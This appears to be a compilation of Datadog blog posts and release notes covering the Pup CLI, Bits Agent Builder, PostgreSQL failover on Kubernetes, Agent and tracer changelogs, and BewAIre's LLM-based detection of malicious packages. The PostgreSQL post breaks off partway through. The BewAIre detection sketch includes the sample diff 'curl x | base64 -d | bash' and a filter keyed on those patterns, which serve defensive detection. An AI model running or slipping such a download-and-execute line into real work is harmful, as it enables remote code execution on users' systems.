Pup CLI gives agents OAuth-scoped Datadog access

AI agents are becoming a standard part of how engineers write, deploy, and troubleshoot software. Getting observability data into those workflows, securely and without manual intervention, remains the harder problem.

Pup CLI gives shell-style agents, automation pipelines, and scripting workflows secure, OAuth-scoped access to 33+ Datadog product domains through a single binary with 200+ commands. Agents can discover commands dynamically, reason over structured JSON or YAML output, and use built-in skills and runbooks without managing long-lived API keys. Because agents pull only the commands they need via pup agent schema rather than loading a full tool definition library upfront, they spend fewer tokens of working context on tool metadata. The CLI pairs with the Datadog MCP Server, which covers conversational, chat-style workflows in IDEs and assistants.

In this post, you'll learn how to:

  • Give shell-style agents a CLI built for Datadog
  • Access the Datadog platform from one binary
  • Authenticate once with OAuth
  • Add Datadog skills and runbooks to your agent
  • Connect any AI client to Datadog locally

Give shell-style agents a CLI built for Datadog

AI agents interact with systems differently depending on where they run. Chat-style assistants inside IDEs need curated, conversational interfaces with confirmation gates and constrained actions. Terminal-native agents, CI/CD workflows, and automation harnesses need composable command-line access that fits naturally into shell workflows.

Modern coding agents are already fluent in shell environments. Models trained on large volumes of terminal interactions understand workflows built around commands such as git, kubectl, jq, and Unix pipes. A well-designed CLI extends an agent's operational capabilities without additional configuration. Agents can invoke commands, chain outputs, and interpret structured responses using patterns they already know.

Pup CLI builds on that model with a single, consistent Rust binary across Claude Code sessions, Cursor workflows, CI runners, runbooks, and custom agent harnesses. Regardless of where an agent runs, it interacts with the same Datadog backend through the same interface and authentication flow.

Access the Datadog platform from one binary

Pup CLI gives agents a single interface to the Datadog platform, from metrics and logs to Incident Management, Real User Monitoring, Application Performance Monitoring, Cloud SIEM, Cloud Cost Management, and more, without switching tools or managing separate integrations.

The CLI is designed to be discoverable for both humans and agents. Engineers can use standard help commands to explore the available functionality, while agents can retrieve the complete command schema dynamically in machine-readable form.

pup --help
pup agent schema

The pup agent schema command returns the complete command tree as structured JSON, allowing agents to inspect available operations only when they need them. Dynamic schema retrieval reduces the amount of tool metadata that needs to remain in an agent's working context, leaving more room for reasoning and planning.

Pup CLI returns structured JSON or YAML output by default, making it easy for agents to parse and chain results into additional workflows. Commands integrate naturally with standard shell tooling such as jq, grep, or custom automation scripts.

For example, an agent investigating a production issue could search logs for recent checkout service failures:

pup logs search --query="status:error service:checkout" --from="1h" \
  | jq '.data[].attributes.message'

An agent could then pivot into monitor investigations:

pup monitors search --tags="team:api-platform"
pup monitors get <id>

Or retrieve active incidents directly from Datadog:

pup incidents list --status=active \
  | jq '.data[].attributes.title'
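
An agent harness written in Python could do the same extraction without jq. The following is a minimal sketch, not part of Pup CLI: the function names are hypothetical, and the payload shape is assumed only from the jq filter `.data[].attributes.message` used above.

```python
import json
import subprocess


def search_checkout_errors() -> str:
    """Run the log search shown above and return pup's raw JSON output."""
    result = subprocess.run(
        ["pup", "logs", "search",
         "--query=status:error service:checkout", "--from=1h"],
        capture_output=True, text=True, check=True,
    )
    return result.stdout


def extract_messages(raw_json: str) -> list[str]:
    """Python equivalent of the jq filter `.data[].attributes.message`."""
    payload = json.loads(raw_json)
    return [item["attributes"]["message"] for item in payload["data"]]


# Hypothetical payload for illustration; real output may carry more fields.
sample = json.dumps({
    "data": [
        {"attributes": {"message": "payment gateway timeout"}},
        {"attributes": {"message": "upstream returned 502"}},
    ]
})

for message in extract_messages(sample):
    print(message)
```

In a real session, `extract_messages(search_checkout_errors())` would replace the sample payload, assuming pup is installed and authenticated.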

Beyond core observability workflows, Pup CLI also covers a broad set of the Datadog API surface. Niche admin operations, preview surfaces, and CRUD support for platform configuration objects are reachable through the same binary and authentication layer, without additional setup.

Authenticate once with OAuth

Many teams rely on long-lived API and application keys spread across shell environments, CI pipelines, Terraform configurations, and internal documentation. Pup CLI addresses this with an OAuth 2.0 + PKCE authentication flow.

Instead of distributing static API keys across multiple environments, you authenticate once through:

pup auth login

Tokens are scoped, revocable, and aware of multi-organization environments. If a device is lost or access needs to be revoked, you can invalidate the associated credentials without rotating every script or automation workflow tied to a static key.

Pup CLI inherits Datadog role-based access control. Agents can only view or act on the resources their authenticated user is already authorized to access. This helps you preserve existing access boundaries while extending Datadog into AI-assisted workflows, including for teams with HIPAA requirements.

A single authenticated session can support multiple local agent workflows, including Claude Code, Cursor, OpenCode, custom agents, and ad hoc scripts. You no longer need to provision and manage separate API keys for every tool or environment.

Managing API keys across CI pipelines, shell environments, and agent tools adds friction when you adopt AI-assisted operations. Pup CLI reduces that friction by consolidating access through a single OAuth-scoped interface, backed by a centralized audit trail and your existing Datadog permissions.

Add Datadog skills and runbooks to your agent

Pup CLI ships with built-in skills and subagents that give agents reusable operational workflows without manual prompt crafting.

For example, you can install bundled skills into Claude Code:

pup skills install claude-code

This command installs skills into .claude/skills/ and native subagents into .claude/agents/.

Cursor workflows are similarly supported:

pup skills install cursor

You can also browse and install individual skills:

pup skills list
pup skills install claude --name=dd-monitors

Pup CLI integrates directly with the Claude Code plugin marketplace as well:

/plugin marketplace add datadog/pup

The bundled skills support operational workflows such as incident triage; log, metric, and trace correlation; change tracking; and Database Monitoring analysis. If you're using Claude Code, you can invoke a workflow such as /sre-investigate and receive a guided investigation that moves through logs, traces, deployments, and database telemetry while the agent calls Pup CLI commands behind the scenes. You can use runbook outputs directly in incident reviews and postmortems.

Pup CLI also supports CI/CD automation scenarios such as deploy event creation, source map uploads, DORA metrics collection, and SLO validation. Each of these workflows uses the same OAuth-scoped authentication as local sessions, so no additional secrets management is needed.

Connect any AI client to Datadog locally

Pup CLI also doubles as an MCP server, letting you connect any MCP-compatible AI client to Datadog without additional authentication or setup steps beyond pup auth login.

The same OAuth session supports Claude Desktop, third-party MCP clients, and custom integrations:

pup mcp serve

This gives you a way to connect Datadog to emerging AI clients as they adopt the Model Context Protocol standard, without waiting for native integrations or managing separate credentials.

Getting started

Pup CLI is available on GitHub. Installation follows the standard Rust toolchain pattern:

cargo install --git https://github.com/DataDog/pup.git
pup auth login
pup --help

For Claude Code users, you can install Datadog skills immediately:

pup skills install claude-code

Or install the plugin from the Claude Code marketplace:

/plugin marketplace add datadog/pup

Full documentation is available on the Datadog docs site.

Learn more at DASH

We're showcasing Pup CLI, the Datadog MCP Server, Bits AI, and the future of agentic observability at DASH NYC on June 9-10. Come see live demos, chat with our engineers, and explore how to give your AI agents first-class access to the Datadog platform.

Claude Agent errors now show descriptive messages; service name race fixed

Bug Fixes
  • LLM Observability: Resolves an issue in the Claude Agent SDK integration where a span's error message showed the uncategorized unknown error category from the upstream Claude Agent SDK instead of a descriptive API error. The integration now surfaces the detailed error message from the assistant message content.
  • tracing: Fixes a race condition where extra service names could be silently dropped from Remote Configuration /v0.7/config payloads in multi-threaded applications (e.g. uWSGI).
  • code origin: Fixes an issue that could cause pytest to crash internally when inspecting the call stack of an exception thrown by a view function while Code Origin is enabled.
  • LLM Observability: Resolves an issue where non-string tag values passed to LLMObs.annotate(tags=...) could cause spans to be dropped during ingestion.
  • LLM Observability: Fixes provider mis-attribution on openai spans when an OpenAI (or AsyncOpenAI) client and an AzureOpenAI (or AsyncAzureOpenAI) client are instantiated at the same time. Provider is now determined per-call rather than from the most recently constructed client.
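
For the non-string tag fix listed above, callers on tracer versions without the fix could coerce tag values to strings before passing them to LLMObs.annotate(tags=...). This is a minimal sketch: the helper name `stringify_tags` is hypothetical and not part of the tracer.

```python
def stringify_tags(tags: dict) -> dict[str, str]:
    """Return a copy of `tags` with every key and value converted to str."""
    return {str(key): str(value) for key, value in tags.items()}


raw_tags = {"retries": 3, "cached": True, "model": "example-model"}
safe_tags = stringify_tags(raw_tags)
print(safe_tags)

# The cleaned mapping would then be passed along, for example:
#   LLMObs.annotate(tags=safe_tags)
```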

Bits Agent Builder — custom AI agents for alert response and remediation

Building automated workflows that adapt to real-world complexity can be a challenge. As systems scale and scenarios multiply, teams often end up hardcoding endless logic branches just to handle every potential outcome.

That's why we're introducing Bits Agent Builder, a powerful new tool that lets you create custom AI agents that are fully hosted by Datadog. These agents can analyze data, reason through complex decisions, and adapt to changing inputs in real time, all without requiring you to hardcode every possible path. With AI-driven orchestration, Datadog Workflow Automation can now power automations that think, react, and scale as intelligently as your systems do.

In this blog post, we will cover the following topics:

  • What is Bits Agent Builder?

  • What types of workflows can you automate with Bits Agent Builder?

What is Bits Agent Builder?

Bits Agent Builder lets you define AI agents that can interpret Datadog observability data and third-party signals—such as which service is affected, what metrics are spiking, or whether similar incidents have occurred—and then take action either automatically through a workflow or on demand through chat. You can describe an agent's goals in natural language, include relevant prompts, and control which data sources and tools it can access. This makes it possible to design agents that reflect the specific architecture, technology stack, and operational patterns of your environment.

Workflows can also chain multiple agents together or trigger agents conditionally based on the situation. For example, an investigation agent might analyze logs and traces to identify a likely root cause, then trigger a remediation agent if the suggested fix matches a known pattern—such as restarting a service, rolling back a deployment, or scaling a resource. These chains allow different agents to specialize in distinct steps of an operational process while maintaining end-to-end automation and control. By orchestrating agents this way, teams can build workflows that reason, act, and adapt in real time, without sacrificing the structure and safety of traditional automation.

What types of workflows can be automated with Bits Agent Builder?

Teams can use Bits Agent Builder to make smarter, faster decisions that draw upon the full range of Datadog's observability data. A key feature of custom agents built with Bits Agent Builder is that they have access to the 2,000+ prebuilt, production-ready actions from Datadog's Action Catalog. These actions connect to external services such as Kubernetes, cloud services, CI/CD platforms, security tools, and more.

Thanks to these built-in integrations with third-party services, you can automate virtually any task without requiring custom code or external integrations. And since your agents run natively in Datadog, your data, logic, and actions all live in one place with no context lost.

To see what this looks like in practice, let's explore some ways you can use Bits Agent Builder to automate complex workflows.

Automate application error investigations

Consider an agent created with Bits Agent Builder to automate the investigation of application errors. This investigator agent runs automatically when a Customer Success Manager or Support Engineer posts a Slack message such as "User reports the app crashed" about a bug. Once triggered, the agent runs a predefined playbook that pulls evidence only from trusted Datadog sources—such as logs, APM, and RUM—to ensure consistent, high-quality investigations. Following the playbook, the agent first searches recent application logs for related errors or warnings, and then checks RUM data to see if any users have experienced similar frontend issues or performance slowdowns. As it collects data, it follows strict standards: Every log or trace is hyperlinked, assumptions are clearly marked, and if nothing is found, it states that clearly.

Finally, the agent compiles a structured report—summarizing findings, linking to evidence, and suggesting possible root causes—and posts it back into Slack. By the time engineers pick up the issue, they already have a data-backed investigation that meets company best practices, powered entirely by Datadog's observability data and AI-driven automation.

Detect and respond to a critical vulnerability

In a second example, imagine how a custom agent could be used to automate a response when critical vulnerabilities are detected. Let's say that Datadog Cloud Security detects several EC2 instances running a vulnerable version of OpenSSL that is affected by a newly disclosed critical CVE, such as CVE-2023-0464. The agent starts by creating a Datadog case, consolidating all relevant details (such as instance IDs, AWS account information, and whether the hosts are internet-facing) to give the security team immediate visibility into the blast radius.

Once the vulnerability is confirmed as high-risk, the agent steps in to contain the threat. It can generate a GitHub pull request to update the OpenSSL version or quarantine the affected EC2 instances by using AWS Systems Manager. It can then notify the responsible engineering team through Slack, Datadog On-Call, or PagerDuty. Every remediation action is logged back into the Datadog case, creating a complete audit trail. This automated, end-to-end response pipeline helps teams move from detection to remediation in minutes, significantly reducing exposure time and strengthening their overall cloud security posture.

Automate service documentation with IDP Scorecards

Scorecards in Datadog's Internal Developer Portal (IDP) help teams measure and enforce operational and engineering standards across their services in areas like deployment readiness, observability coverage, or documentation completeness.

In this use case, a scorecard is configured to assess whether each service repository includes a README.md file. During the scorecard evaluation, if the check detects that a service is missing a README, it triggers a custom Datadog agent. This agent uses metadata from the Service Catalog (like team name, dependencies, and runtime environment) and pulls key context from telemetry data and existing dashboards to auto-generate an initial README draft. It can include sections like "Service Overview," "Dependencies," and "Runbook Links," and then open a pull request in GitHub for the owning team to review and finalize.

By combining Scorecards with automation, teams can close documentation gaps automatically—evaluating, creating, and updating service standards with minimal manual work.

Try Bits Agent Builder today

With Bits Agent Builder, engineers can create and manage purpose-built agents in minutes, accelerating how teams investigate issues and trigger actions across their environments.

Bits Agent Builder is now generally available. You can try it out by navigating to Actions -> Agents in your Datadog account.

If you don't already have a Datadog account, get started with a 14-day free trial today.

When failover isn't safe: Building high-availability PostgreSQL on Kubernetes

Gamedays are one of the most effective ways we proactively uncover gaps in our systems and processes. At Datadog, we regularly run a variety of gamedays to intentionally stress our platforms and learn how our systems and teams respond under real-world conditions. These exercises help us surface hidden vulnerabilities, strengthen our operational readiness, and continually raise the bar for our infrastructure.

During one such gameday, we simulated a zonal failure in a staging environment by inducing network latency in a single availability zone, which exposed a weakness in our PostgreSQL architecture. Several of our Kubernetes-based PostgreSQL clusters had their primary (writer) nodes running in the affected availability zone. As network latency spiked, those primaries could no longer communicate reliably with their replicas. Replication lag quickly grew, writes stalled, and applications began serving stale data. Because no replica was sufficiently up to date, failover wasn't safe and the clusters were effectively stuck.

We rely on PostgreSQL as the backend database for many Datadog products, and this architecture has served us well under normal conditions. But the gameday revealed an uncomfortable truth: In the face of certain network failures, our setup prioritized availability over durability in ways that left us with no safe recovery path.

In practice, this meant the primary continued accepting writes even while replication to replicas was delayed due to elevated network latency. The system remained writable, but replication lag continued to grow, and replicas drifted further behind the primary. As a result, failover candidates could no longer be promoted safely without risking data loss. We were left with only one viable option: wait for latency to subside and for replicas to catch up.

We set out to fix this failure mode. Our goal was to make failover both automatic and safe, without compromising PostgreSQL's performance characteristics more than necessary. To do this, we rearchitected our PostgreSQL deployment to use synchronous replication for failover candidates, coordinated by Patroni, an open source high-availability manager.

In this post, we'll walk through how we redesigned our Kubernetes-based PostgreSQL clusters for failover safety, how we balanced durability against latency, and what we learned while validating this approach through benchmarking and failure testing.

PostgreSQL on Kubernetes: Our baseline architecture

Our Kubernetes-based PostgreSQL clusters are organized into two main pools: a leader pool and a read replica pool. In our architecture, PostgreSQL is a single-writer system, and this separation lets us scale reads independently without overwhelming the leader with a mix of reads and writes. As a result, we can increase read capacity as demand grows while keeping write latency predictable and stable.

The leader pool consists of a single active writer node that handles all write operations, along with two standby nodes. These standbys do not serve application traffic, but they can be promoted if the leader becomes unavailable.

The read replica pool includes multiple nodes that handle read-only traffic. These replicas are optimized for read scalability and query isolation, so they are intentionally excluded from failover.

This design worked well under normal operating conditions, but as we discovered during a zonal failure, it also imposed strict limits on which nodes could safely take over when the leader was impaired.

PostgreSQL high-availability architecture on Kubernetes using Patroni and ZooKeeper. The leader pool manages write operations, while read replicas serve read-only traffic. ZooKeeper coordinates leader election and ensures consistent cluster state.

We use Patroni to manage replication, failovers, and leader elections for our PostgreSQL clusters. Patroni relies on a distributed configuration store (DCS)—in our case, ZooKeeper—to coordinate leader election, maintain a shared view of cluster state, and enforce a single active leader at any point in time.

ZooKeeper stores metadata, including the current leader key/lock, cluster configuration, and each member's replication state, such as its latest log sequence number (LSN). Patroni uses this information to make conservative decisions about promotion and demotion, prioritizing data consistency over aggressive failover.

When a new node joins the cluster, it first checks ZooKeeper to determine whether a leader already exists. If no leader is present, the node attempts to acquire the leader key by creating an ephemeral znode. ZooKeeper guarantees only one node can acquire this leader key, which prevents multiple primaries from forming. If a leader already exists, the joining node configures itself as a replica and starts streaming replication.
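
The join logic above can be illustrated with a toy model. This is a sketch under stated assumptions, not Patroni's or ZooKeeper's actual code: `InMemoryDCS`, `join_cluster`, and the node names are hypothetical, and a thread lock stands in for ZooKeeper's atomic creation of an ephemeral znode.

```python
import threading


class InMemoryDCS:
    """Toy stand-in for ZooKeeper holding a single leader key."""

    def __init__(self):
        self._lock = threading.Lock()
        self._leader = None

    def leader(self):
        with self._lock:
            return self._leader

    def try_acquire_leader(self, node: str) -> bool:
        """Atomically create the leader key; only one caller can succeed."""
        with self._lock:
            if self._leader is None:
                self._leader = node
                return True
            return False

    def expire_session(self, node: str) -> None:
        """An ephemeral key disappears when its owner's session ends."""
        with self._lock:
            if self._leader == node:
                self._leader = None


def join_cluster(dcs: InMemoryDCS, node: str) -> str:
    """Return the role a joining node takes: 'leader' or 'replica'."""
    if dcs.leader() is None and dcs.try_acquire_leader(node):
        return "leader"
    return "replica"


dcs = InMemoryDCS()
roles = {name: join_cluster(dcs, name) for name in ["pg-0", "pg-1", "pg-2"]}
print(roles)

# If the leader's session expires, the key is released and can be reacquired.
dcs.expire_session("pg-0")
print(join_cluster(dcs, "pg-1"))
```

The second check inside `try_acquire_leader` matters: two nodes can both observe "no leader" at the same time, so the create itself has to be the atomic step.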

During a network partition, this caution becomes especially important. A replica that loses connectivity to either the leader or ZooKeeper cannot reliably determine the cluster's current state. Rather than risk an unsafe promotion, Patroni pauses or demotes the affected node until leadership can be verified.

Similarly, if the leader loses connectivity, Patroni coordinates with ZooKeeper to ensure that only a single, eligible standby can acquire the leader lock. This process guarantees that failover happens in a controlled way, even under partial network failure. The following diagram shows how Patroni safely promotes a new primary during a network partition and how the original leader demotes itself after failing to reacquire the leader lock once connectivity is restored.

Sequence of events during a network partition in a Patroni-managed PostgreSQL cluster. When the primary loses connectivity, ZooKeeper releases the expired leader key, allowing an eligible standby to acquire the lock and become the new primary. Once the original primary regains connection, it demotes itself to standby to prevent split brain and rejoins replication.

Why our architecture couldn't fail over safely

Our PostgreSQL architecture uses a single-writer model: Only one leader node accepts writes. During a failure, Patroni is responsible for electing a new leader from among healthy standby nodes.

To protect against data loss, Patroni performs a series of safety checks before promoting a standby. One of the most important is verifying that replication lag is within an acceptable threshold, configured through the maximum_lag_on_failover parameter. If a standby has fallen behind the leader, promoting it could result in missing or inconsistent data.

This safeguard became the limiting factor during our gameday. When the primary node lost connectivity, all available standbys had accumulated replication lag beyond the configured threshold. Because no standby was sufficiently up to date, Patroni correctly rejected the failover attempt. The cluster was left without a safe writable primary, not because Patroni malfunctioned, but because no safe promotion candidate existed.

The following diagram illustrates how Patroni evaluates replication lag during failover and why it refuses promotion when all standbys exceed the maximum_lag_on_failover limit.

Patroni checks replication lag before promoting a standby. If the lag on all standby nodes exceeds the configured maximum_lag_on_failover threshold, failover is rejected to prevent data loss.
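
The lag check can be sketched in a few lines. This is a simplified model rather than Patroni's implementation: the `Standby` type, the function name, and the LSN values are hypothetical, lag is measured in bytes of WAL, and the 1 MiB threshold is only an illustrative value.

```python
from dataclasses import dataclass
from typing import Optional


@dataclass
class Standby:
    name: str
    replayed_lsn: int  # WAL position reached by this standby, in bytes


def pick_failover_candidate(
    leader_lsn: int,
    standbys: list[Standby],
    maximum_lag_on_failover: int,
) -> Optional[Standby]:
    """Return the most up-to-date standby within the lag limit, else None."""
    eligible = [
        s for s in standbys
        if leader_lsn - s.replayed_lsn <= maximum_lag_on_failover
    ]
    if not eligible:
        return None  # failover is rejected rather than risking data loss
    return max(eligible, key=lambda s: s.replayed_lsn)


MIB = 1024 * 1024
leader_lsn = 900_000_000

# Gameday-like situation: every standby is several MiB behind.
lagging = [
    Standby("standby-1", leader_lsn - 5 * MIB),
    Standby("standby-2", leader_lsn - 9 * MIB),
]
print(pick_failover_candidate(leader_lsn, lagging, 1 * MIB))

# Healthy situation: both standbys are within the limit.
healthy = [
    Standby("standby-1", leader_lsn - 100 * 1024),
    Standby("standby-2", leader_lsn - 600 * 1024),
]
print(pick_failover_candidate(leader_lsn, healthy, 1 * MIB).name)
```

In the first case the function returns `None`, which mirrors the gameday outcome: the check worked as intended, and there was simply nothing safe to promote.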

Asynchronous replication vs. synchronous replication

To improve the availability of our PostgreSQL clusters, we revisited our replication strategy, specifically the two modes supported by PostgreSQL's streaming replication.

In streaming replication, the leader continuously streams write-ahead logs (WALs) to its replicas. These logs capture all changes to the database. Replicas stay in sync by applying the WALs locally.

PostgreSQL supports two modes of streaming replication: asynchronous replication, which is the default, and synchronous replication.

Asynchronous replication (default)

In our original setup, PostgreSQL used asynchronous replication. In this mode, the leader does not wait for acknowledgment from replicas before committing a transaction.

This configuration minimizes write latency and supports high-throughput workloads. However, if the leader fails, transactions that were committed on the primary but not yet replicated to a standby can be lost during leader promotion.

Synchronous replication

PostgreSQL also supports synchronous replication. In this mode, the leader waits for acknowledgment from at least one replica before sending the transaction response to the client. This ensures that at least one replica has received every acknowledged commit and provides stronger durability guarantees than asynchronous replication, because committed transactions are confirmed to exist on another node before the client sees a successful response.

With synchronous replication, failover candidates are more likely to be up to date, and a standby can be promoted without risking data divergence.

Our hybrid replication setup

To balance durability, latency, and throughput, we adopted a hybrid replication model:

  • Standby nodes in the leader pool participate in synchronous replication. The leader waits for confirmation from designated synchronous standbys before acknowledging a write to the client.

  • Read replicas continue to use asynchronous replication. They serve read-only traffic and are not considered for failover, which helps limit replication overhead on the leader pool.

This approach lets us apply stricter durability guarantees to failover candidates without imposing the same latency costs on read replicas.
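
To make the difference between the two pools concrete, here is a toy simulation of the hybrid model. It is a sketch under simplifying assumptions, not PostgreSQL's replication protocol: the class and node names are hypothetical, WAL is modeled as a plain list, and an unacknowledged commit returns False where a real leader would keep the client waiting.

```python
class Node:
    def __init__(self, name: str):
        self.name = name
        self.wal: list[str] = []


class Leader(Node):
    def __init__(self, name: str, sync_standbys: list[Node],
                 async_replicas: list[Node]):
        super().__init__(name)
        self.sync_standbys = sync_standbys
        self.async_replicas = async_replicas

    def _ship(self, target: Node) -> None:
        """Send the target every WAL record it is missing."""
        target.wal.extend(self.wal[len(target.wal):])

    def commit(self, record: str, reachable: set[str]) -> bool:
        """Write locally, then acknowledge only if a sync standby confirms."""
        self.wal.append(record)
        acked = False
        for standby in self.sync_standbys:
            if standby.name in reachable:
                self._ship(standby)
                acked = True
        return acked  # read replicas are never waited on

    def flush_async(self) -> None:
        """Read replicas catch up later, outside the commit path."""
        for replica in self.async_replicas:
            self._ship(replica)


standby_a, standby_b = Node("standby-a"), Node("standby-b")
read_replica = Node("read-replica-1")
leader = Leader("leader", [standby_a, standby_b], [read_replica])

acked = [tx for tx in ["tx1", "tx2", "tx3"]
         if leader.commit(tx, reachable={"standby-a"})]
print(acked, standby_a.wal, read_replica.wal)

# With no synchronous standby reachable, the write is not acknowledged.
print(leader.commit("tx4", reachable=set()))

leader.flush_async()
print(read_replica.wal)
```

Every acknowledged transaction is present on `standby-a`, so promoting it loses nothing the client was told had succeeded, while the read replica stays off the commit path entirely.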

How we tuned PostgreSQL and Patroni for safe failover

Enabling synchronous replication required changes in both PostgreSQL and Patroni, which manages leader election and failover for our clusters.

Docker daemon connectivity restored; AppSec webhook fixed

Datadog Agent · v7.79.2

Agent

Prelude

Released on: 2026-06-03

Security Notes
  • Bumped containerd dependencies to mitigate CVE-2026-46680: github.com/containerd/containerd to v1.7.32 and pinned github.com/containerd/containerd/v2 to v2.0.9 (the EOL v2.1.x line has no fix).
Bug Fixes
  • Use the Docker daemon's /ping endpoint instead of /info to verify connectivity during DockerUtil initialization. Some daemons emit DefaultAddressPools[].Base values in /info that are not valid CIDRs, which fail the strict netip.Prefix decoding introduced by the moby v29 client and previously caused DockerUtil to fail to initialize. This cascaded into the Docker workloadmeta collector and the Docker core check being unavailable, leading to missing container/image tags on metrics and traces from Docker containers.

  • Fix the Agent's Docker integration against Docker daemons that return malformed values in their /info response. The failure was visible in Agent logs as:

    Docker init error: temporary failure in dockerutil, will retry later:
    Error reading remote info: netip.ParsePrefix("invalid Prefix"): no '/'

    When triggered, it prevented the Docker integration from initializing, which cascaded into:

    • missing container and image tags on metrics, traces and logs collected from Docker containers,
    • missing docker_version and docker_swarm entries in host metadata,
    • missing docker_swarm_node_role host tag on Docker Swarm nodes,
    • in containerized deployments without an explicit DD_HOSTNAME, the Agent could refuse to start because the Docker hostname provider could no longer determine a hostname.
  • Add the macOS hardened-runtime Location Services entitlement (com.apple.security.personal-information.location) to signed Agent binaries in order to trigger the system location permission prompt properly.

Datadog Cluster Agent

Prelude

Released on: 2026-06-03

Pinned to datadog-agent v7.79.2 (see the CHANGELOG).

Bug Fixes
  • Cluster Agent: Evaluate AppSec sidecar admission webhook match conditions against the deleted object for pod deletion requests.
  • Cluster Agent: Prevent disabled AppSec proxy injection cleanup from enabling the AppSec sidecar admission webhook.

Bedrock Converse/ConverseStream support; OTLP trace IDs now 128-bit

  • [bd9c62865a] - (SEMVER-PATCH) fix(cucumber): support v13 parallel mode (Juan Antonio Fernández de Alba) #8748
  • [5beadb493f] - (SEMVER-PATCH) test(ci): harden sandbox cleanup (Juan Antonio Fernández de Alba) #8741
  • [80fbfd2b7e] - (SEMVER-PATCH) fix(vitest): pin node 18 vitest 3 version (Juan Antonio Fernández de Alba) #8747
  • [5ef172cd28] - (SEMVER-MINOR) feat(aws-sdk, llmobs): support Bedrock Converse and ConverseStream (Alexandre Choura) #8079
  • [c8eb110fc1] - (SEMVER-PATCH) fix(llmobs/ai): surface prompt cache tokens for Vercel AI SDK integration across all supported providers (Jessica Gamio) #8530
  • [6588ac18da] - fix(otlp): Ensure all OTLP spans get the full 128-bit trace IDs (Zach Montoya) #8618
  • [376bad086b] - (SEMVER-PATCH) test(profiling): add retries to OOM heap profile tests for Node 26 compatibility (Attila Szegedi) #8742
  • [e46c478d65] - (SEMVER-PATCH) chore(deps): bump the serverless group across 1 directory with 11 updates (dependabot[bot]) #8738
  • [fe0be207ed] - (SEMVER-PATCH) chore(deps): bump the ai-and-llm group across 1 directory with 5 updates (dependabot[bot]) #8736
  • [e83cf13cdf] - (SEMVER-PATCH) fix(profiling): route logger calls through central log module (Ayan Khan) #8697
  • [908c8119d2] - (SEMVER-PATCH) chore(deps): bump openai (dependabot[bot]) #8735
  • [03116dfb95] - (SEMVER-PATCH) ci(release): fix validation workflow never triggering on proposal branches (Roch Devost) #8714
  • [3b6d66c138] - (SEMVER-PATCH) test(aws-sdk): fix flaky stepfunctions startExecution span assertion (Roch Devost) #8717
  • [0687e2f44f] - (SEMVER-PATCH) fix(ci): handle stale failure conclusion in all-green retry (Roch Devost) #8599

Attackers are increasingly targeting the software supply chain, compromising widely used dependencies to distribute malicious code downstream at scale. Over the past few months alone, incidents involving packages like axios, LiteLLM, and Mistral showed how quickly these attacks can spread across trusted ecosystems.

In our previous post, Detecting malicious pull requests at scale with LLMs, we introduced BewAIre, a system we built to detect malicious code in pull requests by using large language models (LLMs). BewAIre quickly became a reliable part of our security workflows, helping us identify penetration tests, bug bounty activity, and real-world attacks, including activity from the recent Hackerbot campaign.

But pull requests are only part of the attack surface. We wanted to answer a harder question: Could we extend the same LLM-based detection approach to entire dependency packages and upstream package registries without sacrificing accuracy, latency, or predictable cost?

In this post, we show how we expanded BewAIre from pull request analysis to large-scale package scanning by combining stacked LLM evaluations with tool-driven investigation loops. We'll walk through the engineering trade-offs behind scaling malicious code detection across ecosystems while maintaining high accuracy and operational efficiency.

How BewAIre uses agentic investigation to catch what LLM-as-judge misses

BewAIre began as a simple LLM-as-judge system: Send a diff to an LLM inference API and get an evaluation back. After a few months of prompt engineering and fine-tuning, we started to hit a few natural limits. More capable reasoning models improved accuracy, but they came at a higher cost. At the same time, large diffs, especially those from dependency upgrades, pushed against context window limits.

We had seen enough early success to keep investing in this approach, but we needed to reach the next layer of performance.

After initial investigation, we focused on two changes that made the biggest difference:

  • Two-stage evaluation: A filter-then-assess escalation path

  • Tools for active investigation: Allows the model to gather additional context instead of relying only on the diff

In keeping with our naming scheme, we now refer to these as the filter phase and the investigation phase.

How stacked LLM calls cut false positives

Rather than running a single expensive analysis on every incoming change, BewAIre uses a two-stage evaluation pipeline: the filter phase, which screens all changes quickly and cheaply, and the investigation phase, which examines flagged changes in depth.

The first pass uses an inexpensive model, typically the previous generation's state-of-the-art (SOTA) model or the current generation's high-speed, low-cost variant. It runs with a straightforward prompt and the diff-chunking strategy we outlined in our first post for especially large diffs.

This first pass asks a simple question: Does anything in this change look suspicious?

The verdict is binary: either suspicious or benign. If the first pass clears a pull request as benign, the pipeline exits immediately and the second pass never runs. However, when the first evaluation loop raises a flag, we escalate to our second check, which is an agentic investigation loop with access to tools.

This second investigation phase is an agentic system that relies on a higher-powered reasoning model. Rather than passively reading a diff, it actively investigates. It can call GitHub APIs to list commits, inspect file contents, review contributor histories, examine dependency metadata, and compare commit ranges.

Notably, the investigation agent can explore whether suspicious commits were quietly reverted to hide changes from the final diff, whether a dependency resembles a typosquatting attack, and whether an author's account history and affiliation align with legitimate contribution patterns. Dependencies referenced in the PR can be validated against resources like osv.dev and Datadog's Software Composition Analysis (SCA).

The resulting system looks like this:

Two-stage evaluation pipeline for malicious pull request and package analysis.
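The control flow of the two stages can be sketched in a few lines. This is a minimal illustration, not BewAIre's implementation: `evaluate_change`, `toy_filter`, and `toy_investigate` are hypothetical names, and the two toy functions are simple string checks standing in for the inexpensive filter model and the tool-using investigation agent.

```python
from dataclasses import dataclass
from typing import Callable, Tuple


@dataclass
class Verdict:
    malicious: bool
    stage: str   # which stage produced the verdict: "filter" or "investigation"
    reason: str


def evaluate_change(
    diff: str,
    filter_check: Callable[[str], bool],
    investigate: Callable[[str], Tuple[bool, str]],
) -> Verdict:
    """Run the cheap filter first and escalate only when it flags the change."""
    if not filter_check(diff):
        # Benign at the filter stage: exit early, the expensive stage never runs.
        return Verdict(False, "filter", "filter found nothing suspicious")
    malicious, reason = investigate(diff)
    return Verdict(malicious, "investigation", reason)


# Hypothetical stand-ins for the two model calls (assumptions for illustration).
def toy_filter(diff: str) -> bool:
    return "base64 -d" in diff or "| bash" in diff


def toy_investigate(diff: str) -> Tuple[bool, str]:
    if "curl" in diff:
        return True, "decodes and executes a remote payload"
    return False, "flagged pattern has a benign explanation"


if __name__ == "__main__":
    print(evaluate_change("fix typo in README", toy_filter, toy_investigate))
    print(evaluate_change("curl x | base64 -d | bash", toy_filter, toy_investigate))
```

Passing the two stages in as callables keeps the early-exit logic separate from whichever models or tools sit behind each stage.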

This two-stage pipeline had dramatic results, improving our accuracy from 97.4% to 99.86% over our representative sample set of 690 test diffs, primarily by dropping our false positives from 17 to 0. It also reduced latency by allowing the vast majority of benign pull requests to exit early, while preserving thorough coverage when something looks suspicious.
